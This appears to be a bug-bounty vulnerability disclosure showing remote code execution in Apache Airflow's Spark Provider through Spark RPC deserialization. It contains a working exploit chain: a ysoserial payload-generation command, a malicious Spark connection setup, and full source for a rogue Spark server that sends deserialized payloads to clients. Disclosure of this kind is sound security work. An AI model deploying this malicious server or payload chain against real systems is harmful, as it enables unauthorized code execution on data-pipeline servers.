Apache Airflow Spark Provider. After the malicious Spark server address is configured through the connections of the Airflow UI interface, attackers exploit malicious servers to manipulate pyspark clients through malicious deserialization data. So as to implement RCE attack on airflow server.
##Vulnerability principle:
1. Analyze spark principle: Spark protocol is based on RPC communication. The RPC communication process is a serialization and deserialization process, Therefore, attackers can call arbitrary java methods through deserialization, implement RCE.
2.Spark can attack the server through malicious client deserialization, and can also attack the client through malicious server; In the Airflow scenario, PySpark is used as a client to connect to the Spark Server through Spark Provider. So, an attacker only needs to construct a malicious server to attack Airflow’s Spark client.
The command that triggers deserialization is as follows:
**spark-submit –master spark://evil_ip:port**
Therefore, an attacker can configure malicious ip and port through the connections of the Airflow UI. And to execute the above command, then trigger the deserialization operation.
##Vulnerability exploitation process:
1. Create a new ‘Spark’ connection is named ‘spark_default’,and configure the Port and Host parameter.
Host: spark://172.31.76.174
Port: 8888
###172.31.76.174 is malicious spark server address for attackers
(F2648714)
{F2648715}
2.Attackers generate malicious deserialized data (exp.der) through the deserialization tool ysoserial.
**Tool URL: https://github.com/frohoff/ysoserial**
The attacker locally executes the following commands:
**”C:Program FilesJavajre1.8.0_361binjava” -jar ysoserial.jar CommonsCollections4 “touch /tmp/thisisRCE” > exp.der**
#touch /tmp/thisisRCE is malicious commands to be executed on airflow.
{F2648716}
3.The attacker starts the malicious Spark server locally and specifies the malicious deserialized data to be transmitted.
**python2 evil_spark_server.py 8888 exp.der**
{F2648717}
4. Enter the DAGs menu and start hive_dag task, select “Trigger DAG w/ config”.
https://localhost:8080/trigger?dag_id=example_spark_operator
{F2648718}
4. The final command is as follows:
**spark-submit –master spark://172.31.76.174:8888 –name arrow-spark /tmp/file**
Through the log and server view, it can be seen that any command has been executed successfully.
{F2648719}
The malicious server successfully accepted the request and sent malicious data.
{F2648720}
Successfully executed malicious commands on Airflow Worker Server.
{F2648722}
**evil_spark_server.py**
“`
#!/usr/bin/python
import socket
import os
import sys
import struct
from SocketServer import BaseRequestHandler, ThreadingTCPServer
class EchoHandler(BaseRequestHandler):
def handle(self):
print ‘Got connection from %s’%(str(self.client_address))
while True:
msg = self.request.recv(8192)
print msg
if not msg:
break
if len(msg) > 16:
print “Send msg>>>”
self.request.send(build_msg(msg[9:17]))
def build_msg(request_id):
payloadObj = open(sys.argv[2],’rb’).read()
msg_type = ‘x04’
head_length = 21
msg = struct.pack(‘>Q’,len(payloadObj) + 21) + msg_type + request_id
msg += struct.pack(‘>I’,len(payloadObj)) + payloadObj
return msg
if __name__ == ‘__main__’:
if len(sys.argv) < 3:
print ‘Usage: python %s ‘ % os.path.basename(sys.argv[0])
sys.exit()
serv = ThreadingTCPServer((‘0.0.0.0’, int(sys.argv[1])), EchoHandler)
print “Server listening on 0.0.0.0:%s”%(sys.argv[1])
serv.serve_forever()
“`
**DAG Demo(example_spark.py):**
“`
from datetime import datetime
from airflow.models import DAG
from airflow.providers.apache.spark.operators.spark_jdbc import SparkJDBCOperator
from airflow.providers.apache.spark.operators.spark_sql import SparkSqlOperator
from airflow.providers.apache.spark.operators.spark_submit import SparkSubmitOperator
with DAG(
dag_id=’example_spark_operator’,
schedule_interval=None,
start_date=datetime(2021, 1, 1),
catchup=False,
tags=[‘example’],
) as dag:
# [START howto_operator_spark_submit]
submit_job = SparkSubmitOperator(
application=”/tmp/file”, task_id=”submit_job”
)
# [END howto_operator_spark_submit]
# [START howto_operator_spark_jdbc]
jdbc_to_spark_job = SparkJDBCOperator(
cmd_type=’jdbc_to_spark’,
jdbc_table=”foo”,
spark_jars=”${SPARK_HOME}/jars/postgresql-42.2.12.jar”,
jdbc_driver=”org.postgresql.Driver”,
metastore_table=”bar”,
save_mode=”overwrite”,
save_format=”JSON”,
task_id=”jdbc_to_spark_job”,
)
spark_to_jdbc_job = SparkJDBCOperator(
cmd_type=’spark_to_jdbc’,
jdbc_table=”foo”,
spark_jars=”${SPARK_HOME}/jars/postgresql-42.2.12.jar”,
jdbc_driver=”org.postgresql.Driver”,
metastore_table=”bar”,
save_mode=”append”,
task_id=”spark_to_jdbc_job”,
)
# [END howto_operator_spark_jdbc]
# [START howto_operator_spark_sql]
sql_job = SparkSqlOperator(sql=”SELECT * FROM bar”, master=”local”, task_id=”sql_job”)
# [END howto_operator_spark_sql]
“`
## Impact
RCERead More